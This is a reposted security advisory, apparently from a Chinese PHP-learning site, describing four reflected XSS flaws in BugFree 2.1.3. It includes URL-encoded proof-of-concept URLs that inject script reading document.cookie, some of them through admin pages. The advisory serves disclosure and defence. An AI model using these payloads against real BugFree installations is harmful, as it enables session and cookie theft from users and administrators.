网站地图    收藏   

主页 > 后端 > 网站安全 >

BugFree多个缺陷及修复 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 产品: BugFree开发这网站: www.bugfree.org.cn影响版本: 2.1.3 and probably prior已测试版本: 2.1.3缺陷类型: XSS (Cross Site Scripting)技术分析:High-Tech Bridge SA Security Research Lab......

 

产品: BugFree

开发这网站: www.bugfree.org.cn 

影响版本: 2.1.3 and probably prior

已测试版本: 2.1.3

缺陷类型: XSS (Cross Site Scripting)

技术分析:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in BugFree , which can be exploited to perform cross-site scripting attacks.

 

1) Input passed via the "ActionType" GET parameter to Bug.php is not properly sanitised before being returned to the user.

This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

 

The following PoC code is available:

 

http://www.2cto.com /Bug.php?BugID=1&ActionType=%22%3E%3Cscript%3Ealert%28docum

ent.cookie%29;%3C/script%3E

 

2) Input passed via the "ReportMode" GET parameter to Report.php is not properly sanitised before being returned to the user.

This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

 

The following PoC code is available:

 

http://www.2cto.com /Report.php?ReportMode=%3C/title%3E%3Cscript%3Ealert%28docu

ment.cookie%29;%3C/script%3E

 

3) Input passed via the "ReportMode" GET parameter to ReportLeft.php is not properly sanitised before being returned to the user.

This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

 

The following PoC code is available:

 

http://www.2cto.com /ReportLeft.php?ReportMode=%22%3E%3Cscript%3Ealert%28docume

nt.cookie%29;%3C/script%3E

 

4) Input appended to the URL after AdminProjectList.php, AdminGroupList.php, AdminUserLogList.php is not properly sanitised before being returned to the user.

This can be exploited to execute arbitrary HTML and script code in a administator browser session in context of affected website.

 

The following PoC code is available:

 

http://www.2cto.com /admin/AdminProjectList.php/%27;%3C/script%3E%3Cscript%3Eal

ert%28document.cookie%29;%3C/script%3E

http://www.2cto.com /admin/AdminGroupList.php/%27;%3C/script%3E%3Cscript%3Ealer

t%28document.cookie%29;%3C/script%3E

http://www.2cto.com /admin/AdminUserLogList.php/%27;%3C/script%3E%3Cscript%3Eal

ert%28document.cookie%29;%3C/script%3E

 

Disclaimer: Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on the web page in Reference field.

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论